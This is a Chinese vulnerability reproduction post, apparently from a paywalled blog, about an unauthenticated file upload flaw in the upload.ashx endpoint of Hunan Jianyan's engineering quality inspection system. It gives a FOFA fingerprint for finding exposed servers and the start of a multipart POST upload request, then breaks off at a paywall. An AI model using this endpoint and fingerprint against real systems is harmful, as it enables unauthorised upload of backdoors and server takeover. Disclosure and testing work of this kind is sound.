超级会员免费看
0x01 产品简介
湖南建研信息工程质量检测系统能够实现检验工作的计算机化和网络化管理,基本实现检测数据的自动采集,确保检验数据的公正性、科学性和准确性,确保检验报告的规范性和权威性,确保检验工作的高效率和服务的及时性。
0x02 漏洞概述
湖南建研信息工程质量检测系统upload.ashx接口处存在文件上漏洞,未授权的攻击者可通过此漏洞上传恶意后门文件,执行恶意命令获取服务器权限。
0x03 复现环境
FOFA:body="/Content/Theme/Standard/webSite/login.css"
0x04 漏洞复现
上传txt文件
POST /Applications/Attachment/upload.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: multipart/form-data; boundary=------------------------8ecd2b831e8d20f4
Connection: close
--------------------------8ecd2b831e8
订阅专栏 解锁全文
964
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
